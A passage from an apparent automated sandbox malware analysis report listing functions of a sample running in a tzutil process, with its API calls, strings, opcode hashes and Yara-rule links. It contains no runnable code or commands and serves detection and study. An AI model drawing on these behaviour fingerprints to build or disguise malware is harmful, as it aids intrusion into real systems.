                                                          • API ID: MessagePostThread
                                                          • String ID: UQ63g7r-$UQ63g7r-
                                                          • API String ID: 1836367815-2341035416
                                                          • Opcode ID: 62b292c3c3ca90a3d03e3c875e4c1b8689c76b4a674dae31fd32f42cb8c9fed4
                                                          • Instruction ID: 4a01c8df0830ae14ea6bdc73fafa58c68e1f151e19ee680879994765490149c6
                                                          • Opcode Fuzzy Hash: 62b292c3c3ca90a3d03e3c875e4c1b8689c76b4a674dae31fd32f42cb8c9fed4
                                                          • Instruction Fuzzy Hash: ED118EB690024D7AAB10AAE54CC2DEFBB6CDF51794F048159FA14B7241D6389E068BA1
                                                          Function 001D11E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 463 1d11e0-1d1247 call 1eb890 call 1ec2a0 call 1d4990 call 1c13e0 call 1e2000 474 1d1249-1d1258 PostThreadMessageW 463->474 475 1d1267-1d126d 463->475 474->475 476 1d125a-1d1264 474->476 476->475
                                                          APIs
                                                          • PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 001D1254
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2610067851.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1c0000_tzutil.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID: UQ63g7r-$UQ63g7r-
                                                          • API String ID: 1836367815-2341035416
                                                          • Opcode ID: f03869fda7b0d1a7782fc448fc1cae66ffdd3959067e50402559fb878f61b7a5
                                                          • Instruction ID: 31282635f2f032ae9dab82db0e49b9cd3d79fdb8c6a1ecfa5c9431549ac14e41
                                                          • Opcode Fuzzy Hash: f03869fda7b0d1a7782fc448fc1cae66ffdd3959067e50402559fb878f61b7a5
                                                          • Instruction Fuzzy Hash: C30180B2D0024D7BEB10ABE59C82DEF7B7C9F51794F048069FA14B7241D7385E068BA1
                                                          Function 001E3E10 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 107sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • Sleep.KERNELBASE(000007D0), ref: 001E3EDD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2610067851.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1c0000_tzutil.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID: net.dll$wininet.dll
                                                          • API String ID: 3472027048-1269752229
                                                          • Opcode ID: 9f740d79c788470d887b3227eaab9aa7a109ce6250c2a78a7db5aa02bcc623de
                                                          • Instruction ID: 33a865681564b47ae0766db15f54e41f7c6e707ddf7c33b123c41b347262480c
                                                          • Opcode Fuzzy Hash: 9f740d79c788470d887b3227eaab9aa7a109ce6250c2a78a7db5aa02bcc623de
                                                          • Instruction Fuzzy Hash: F5318DB1A01606BBD714DFA5CC84FEBBBB9EB88700F00411DF62D5B241C774AA00CBA0
                                                          Function 001DF8DD Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 103COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2610067851.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1c0000_tzutil.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InitializeUninitialize
                                                          • String ID: @J7<
                                                          • API String ID: 3442037557-2016760708
                                                          • Opcode ID: e3ac8dca9d4a5e2f21f3405cabb02933aee54d61612d24bb33dfc2b886692964
                                                          • Instruction ID: 4662dbdb0342f7ff88c8b35971fd77c9cbdbd55600a1ecfc099558460470041e
                                                          • Opcode Fuzzy Hash: e3ac8dca9d4a5e2f21f3405cabb02933aee54d61612d24bb33dfc2b886692964
                                                          • Instruction Fuzzy Hash: E4311076A0060AAFDB14DF98C8809EFB7B9FF88304B108559E506A7314D775AE458BA0
                                                          Function 001DF8E0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2610067851.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1c0000_tzutil.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InitializeUninitialize
                                                          • String ID: @J7<
                                                          • API String ID: 3442037557-2016760708
                                                          • Opcode ID: 1f689e5722081d79dd2b489bdd5053e9c44b1b93b73407c68c5540e258936cf8
                                                          • Instruction ID: 60881cc71807e6935ca536b577f7b0f184bfc1ba158fd6c8b8a9e586caa52704
                                                          • Opcode Fuzzy Hash: 1f689e5722081d79dd2b489bdd5053e9c44b1b93b73407c68c5540e258936cf8
                                                          • Instruction Fuzzy Hash: CC311275A0060AAFDB04DFD9C8809EFB7B9BF88304B108559E506A7314D775AE058BA0
                                                          Function 001D4A0B Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2610067851.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1c0000_tzutil.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 59613f67ab0b44fc569472441be565e37fa422d4333c6dd1dd2efb647779117c
                                                          • Instruction ID: 4ac6a0a67d49038262b23c6c5415c3bb5cef93cce039ccb64e3db00b73a3cb50
                                                          • Opcode Fuzzy Hash: 59613f67ab0b44fc569472441be565e37fa422d4333c6dd1dd2efb647779117c
                                                          • Instruction Fuzzy Hash: 7E21EE7B7402051FC315CA28D882BF9B728EB92325F11029AF915CF381EB315E16C7E4
                                                          Function 001D4A25 Relevance: 1.6, APIs: 1, Instructions: 96libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 001D4A02
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2610067851.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1c0000_tzutil.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Load
                                                          • String ID:
                                                          • API String ID: 2234796835-0
                                                          • Opcode ID: aa15e0bea88f3d3eb8164487ffdb839de0913709777854031ac92b482dca4ce8
                                                          • Instruction ID: 889d9a0ab1ffaa21c6dfce5d7f7f9a2c954bd5e06f412cae66e89dbea0c40596
                                                          • Opcode Fuzzy Hash: aa15e0bea88f3d3eb8164487ffdb839de0913709777854031ac92b482dca4ce8
                                                          • Instruction Fuzzy Hash: 8121DF3B7401568FCB11CE28C841AFAFF64EB96718B6542EBD465CB342D332D8068794
                                                          Function 001D4990 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 001D4A02
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2610067851.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1c0000_tzutil.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Load
                                                          • String ID:
                                                          • API String ID: 2234796835-0
                                                          • Opcode ID: b799f33cdfcceec68cf2461573a55d2e37cccfb65537d172954ac166eadf2d1b
                                                          • Instruction ID: d26d4b22cfcc9d0d66c73720e4140068a9c7b3e5cb8ca3c66e5d1189ffd6347e
                                                          • Opcode Fuzzy Hash: b799f33cdfcceec68cf2461573a55d2e37cccfb65537d172954ac166eadf2d1b
                                                          • Instruction Fuzzy Hash: 5B011EB5D4024DBBDF10DAA5DC42F9EB7B89B54308F004195E91897241F771EB15CB91
                                                          Function 001E9B50 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateProcessInternalW.KERNELBASE(?,?,?,?,001D8724,00000010,?,?,?,00000044,?,00000010,001D8724,?,?,?), ref: 001E9BB3
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2610067851.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1c0000_tzutil.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateInternalProcess
                                                          • String ID:
                                                          • API String ID: 2186235152-0
                                                          • Opcode ID: ba0705d331adb0827d90e0a0c05e4e99946108ce1be150fedcd619b1613f899a
                                                          • Instruction ID: ebc8236622a62ed9bde65445373de4a860f2627506e89e749623eae15591691c
                                                          • Opcode Fuzzy Hash: ba0705d331adb0827d90e0a0c05e4e99946108ce1be150fedcd619b1613f899a
                                                          • Instruction Fuzzy Hash: 7101CCB2215508BBCB08DE99DC91EEB77ADEF8D754F518208FA09E3241D630F8518BA4
                                                          Function 001C9F20 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 001C9F62
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2610067851.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1c0000_tzutil.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateThread
                                                          • String ID:
                                                          • API String ID: 2422867632-0
                                                          • Opcode ID: c463900b9fbcea7865d729dbd8ce692ca1e0d4df9bad2f7c5cf101c691f30119
                                                          • Instruction ID: 0cc3d6666dc8f1b4ff9b324270b55e837453e69c03c1c1a892e94263ffcbebb4
                                                          • Opcode Fuzzy Hash: c463900b9fbcea7865d729dbd8ce692ca1e0d4df9bad2f7c5cf101c691f30119
                                                          • Instruction Fuzzy Hash: 97F06D3338070436E22061EA9C03FDBB79C9FA5B75F14002AF60DEA1C1DAA6F80186E4
                                                          Function 001C9F1A Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 001C9F62
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2610067851.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1c0000_tzutil.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateThread
                                                          • String ID:
                                                          • API String ID: 2422867632-0
                                                          • Opcode ID: 5b05dc4f9ac00e1fb97425b4699cabbd5fdff5ea68f0ab42ae6c2005985b54c1
                                                          • Instruction ID: 3180b09655b8e92db1410c335e350e359376e609d6f2a8ae0dd82e0aedc9fdb5
                                                          • Opcode Fuzzy Hash: 5b05dc4f9ac00e1fb97425b4699cabbd5fdff5ea68f0ab42ae6c2005985b54c1
                                                          • Instruction Fuzzy Hash: A4F0E5322407403AE33062A98C03FDFAB9C9FA5B60F24011DF609AB1C1C6A6F40187E4
                                                          Function 001E9A90 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(001D1E59,?,001E5F17,001D1E59,?,001E5F17,?,001D1E59,001E59BF,00001000,?,00000000), ref: 001E9AC9
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2610067851.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1c0000_tzutil.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: ac00b1638777126d2cea74cea7df9c0d5320b23dccd002bc6f264aef07eeb62c
                                                          • Instruction ID: 2e917bcfcec892c1a0d85061d348d08915c2b9878553cb57530b63b82b623be2
                                                          • Opcode Fuzzy Hash: ac00b1638777126d2cea74cea7df9c0d5320b23dccd002bc6f264aef07eeb62c
                                                          • Instruction Fuzzy Hash: FEE09A72200208BBC614EF59DC41F9B73ACEFC9710F004408FA08A7242C731B9108BF8
                                                          Function 001E9AD0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,3777EA40,00000007,00000000,00000004,00000000,001D4211,000000F4), ref: 001E9B09
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2610067851.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1c0000_tzutil.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: b80920223b0d3d6ec0276f1483e88535983c36a14dc249cb946427c0f6602cca
                                                          • Instruction ID: fd970dd4602becf114294577f4aaddbc28f466db02cfb96e375299208687c143
                                                          • Opcode Fuzzy Hash: b80920223b0d3d6ec0276f1483e88535983c36a14dc249cb946427c0f6602cca
                                                          • Instruction Fuzzy Hash: 16E06572200204BBC624EE59DC42FAB73ACEF8AB14F004418F908A7242C730F8208AB4
                                                          Function 001D8760 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 001D878A
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2610067851.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1c0000_tzutil.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AttributesFile
                                                          • String ID:
                                                          • API String ID: 3188754299-0
                                                          • Opcode ID: b2fdd7f5a1d97f55da9e9883e388d1a9d0ed00b807dd1d66f4156bc78fba80a9
                                                          • Instruction ID: 28a5bc5baf953492c13793f55d7188a9ee63c94d4491571c52bdb920a000edea
                                                          • Opcode Fuzzy Hash: b2fdd7f5a1d97f55da9e9883e388d1a9d0ed00b807dd1d66f4156bc78fba80a9
                                                          • Instruction Fuzzy Hash: 73E086752406043BFF1476A89C46F66335C4B88734F284A51FA1CDB3C2DB78F9018654
                                                          Function 001D8560 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetErrorMode.KERNELBASE(00008003,?,?,001D2150,001E82FF,?,001D211B), ref: 001D8591
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2610067851.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1c0000_tzutil.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorMode
                                                          • String ID:
                                                          • API String ID: 2340568224-0
                                                          • Opcode ID: 8078e4b5b8cf14619579fb5ecae74e25a8c9f02cfd6a8169a37789255bfbf125
                                                          • Instruction ID: 94abdee79557053e7da16bb47df813be7683ee627647b00a18d2578deb92748d
                                                          • Opcode Fuzzy Hash: 8078e4b5b8cf14619579fb5ecae74e25a8c9f02cfd6a8169a37789255bfbf125
                                                          • Instruction Fuzzy Hash: CDD05E723803043BFA00A6E59C43F56328D5F15B65F050064FA0CEA2C2DA65F6008965
                                                          Function 02CB2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2615477604.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C40000, based on PE: true
                                                          • Associated: 00000008.00000002.2615477604.0000000002D69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002D6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002DDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_2c40000_tzutil.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: b89c2e261aa7d033cbdfd7c2ebf1e4477302e0d7d3fdc1f149d4c91bd5175f04
                                                          • Instruction ID: d5b498dc81e4d40484b50f5d463cf13911da13ebfe1fe9b4072578c875716f72
                                                          • Opcode Fuzzy Hash: b89c2e261aa7d033cbdfd7c2ebf1e4477302e0d7d3fdc1f149d4c91bd5175f04
                                                          • Instruction Fuzzy Hash: 85B09B71D419C5C5EA12E7604A087177A006BD0702F25C165D2030641E4739C5D1E176

                                                          Non-executed Functions

                                                          Function 02AE04D0 Relevance: .1, Instructions: 149COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2615155521.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_2ae0000_tzutil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 54c83316a2d1e38cf01f858fa1577372f4876acfbed09934fba294c8bba2248b
                                                          • Instruction ID: a92bb44dda126ff75b00c9c4196a3b5ba890e89d129039804275220059e317b7
                                                          • Opcode Fuzzy Hash: 54c83316a2d1e38cf01f858fa1577372f4876acfbed09934fba294c8bba2248b
                                                          • Instruction Fuzzy Hash: 5B41E270658F0D4FDB68AF6890816B6B3E2FB48310F50462DD98BC3252EFB4E8478685
                                                          Function 02AEE0C9 Relevance: 56.5, Strings: 45, Instructions: 249COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2615155521.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_2ae0000_tzutil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                          • API String ID: 0-3558027158
                                                          • Opcode ID: 47cf9afc285d78d3c590a56293d944d5d20f980efb9425facb2a64674c5c23be
                                                          • Instruction ID: 2227f03fa8c6e204fd202c2c82676e2cbf9b0d194be3614c5faa89df075be40d
                                                          • Opcode Fuzzy Hash: 47cf9afc285d78d3c590a56293d944d5d20f980efb9425facb2a64674c5c23be
                                                          • Instruction Fuzzy Hash: 96A162F04483948AC7158F54A1552AFFFB0EBC6305F15816DE6E6BB243C3BE8909CB85
                                                          Function 02CB2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2615477604.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C40000, based on PE: true
                                                          • Associated: 00000008.00000002.2615477604.0000000002D69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002D6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002DDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_2c40000_tzutil.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                          • API String ID: 48624451-2108815105
                                                          • Opcode ID: b9086663c897afb933e2932fd62fc2bbaf8ae92e7d3a541122b7ee36ed105b81
                                                          • Instruction ID: 7ceee72897cffd50c83a9cc1b2a4435d30ce7893781dffb87fda147a3c93ef2d
                                                          • Opcode Fuzzy Hash: b9086663c897afb933e2932fd62fc2bbaf8ae92e7d3a541122b7ee36ed105b81
                                                          • Instruction Fuzzy Hash: FD51F8B2E00556BFDF11DB9888909BEF7B8BF48200B508169E86AD7641D335DF00CBE1
                                                          Function 02D22410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2615477604.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C40000, based on PE: true
                                                          • Associated: 00000008.00000002.2615477604.0000000002D69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002D6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002DDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_2c40000_tzutil.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                          • API String ID: 48624451-2108815105
                                                          • Opcode ID: dd97167294026eb5b86ca949ab4e1c058f63cb2162245580757716518c68f3d2
                                                          • Instruction ID: e238b26785c99d5c66fdc6c9caa5a82246272c677c798fd14092aadabf9a9783
                                                          • Opcode Fuzzy Hash: dd97167294026eb5b86ca949ab4e1c058f63cb2162245580757716518c68f3d2
                                                          • Instruction Fuzzy Hash: A551F261A00665AADB20CE98C89497BB7FDAF64308B408469F8D6C7741E774DE04CB60
                                                          Function 02CA7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02CE4655
                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 02CE4787
                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 02CE4742
                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02CE46FC
                                                          • Execute=1, xrefs: 02CE4713
                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02CE4725
                                                          • ExecuteOptions, xrefs: 02CE46A0
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2615477604.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C40000, based on PE: true
                                                          • Associated: 00000008.00000002.2615477604.0000000002D69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002D6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002DDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_2c40000_tzutil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                          • API String ID: 0-484625025
                                                          • Opcode ID: eb5aa752e13ac1941a9f710b6f443e72b053b46e3518556b65eec6fdf16f8c90
                                                          • Instruction ID: e0ff5340e179b97e0e94992dd619a7e2ee183c8ef4e867fe776a5d56ac0437d8
                                                          • Opcode Fuzzy Hash: eb5aa752e13ac1941a9f710b6f443e72b053b46e3518556b65eec6fdf16f8c90
                                                          • Instruction Fuzzy Hash: A651093160021A6AEF21ABA8DCA9BEDB7B9FF44308F0400A9D505A7191E771DE49DF94
                                                          Function 02D46940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2615477604.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C40000, based on PE: true
                                                          • Associated: 00000008.00000002.2615477604.0000000002D69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002D6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002DDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_2c40000_tzutil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                          • Instruction ID: e39931c592f7c6d37be8ba6b0e68ff779432c6415c1df42302e19e7338a1b34a
                                                          • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                          • Instruction Fuzzy Hash: 69021671508341AFD705CF28C490A6BBBEAEFC9704F14892DF9998B364DB31E945CB92
                                                          Function 02CBB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2615477604.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C40000, based on PE: true
                                                          • Associated: 00000008.00000002.2615477604.0000000002D69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002D6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002DDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_2c40000_tzutil.jbxd
                                                          Similarity
                                                          • API ID: __aulldvrm
                                                          • String ID: +$-$0$0
                                                          • API String ID: 1302938615-699404926
                                                          • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                          • Instruction ID: c08937e470ffcefd599cb4a3d0cbbcdf7f206c23bd1f046d5ca66c40ce248a78
                                                          • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                          • Instruction Fuzzy Hash: BF81D570E452499EDF2ACF68C8917FEBBB2AF8531CF18415ADC51A7690C7359E40CB60
                                                          Function 02D220E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2615477604.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C40000, based on PE: true
                                                          • Associated: 00000008.00000002.2615477604.0000000002D69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002D6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002DDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_2c40000_tzutil.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: %%%u$[$]:%u
                                                          • API String ID: 48624451-2819853543
                                                          • Opcode ID: 48b8fe61889ada0bca10646aeecb19a4cbca78ee126d8a3b22d3538a3a51ab8d
                                                          • Instruction ID: ef69b659282c9586a2746cc0ecd4540fa6c245ff5d44566e6a519188106f89fd
                                                          • Opcode Fuzzy Hash: 48b8fe61889ada0bca10646aeecb19a4cbca78ee126d8a3b22d3538a3a51ab8d
                                                          • Instruction Fuzzy Hash: 04214F76A00129ABDB11DE69C944EEEB7E9AF54758F040126FD05E3200E7309A05DBA1
                                                          Function 02AE3CBE Relevance: 8.8, Strings: 7, Instructions: 68COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2615155521.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
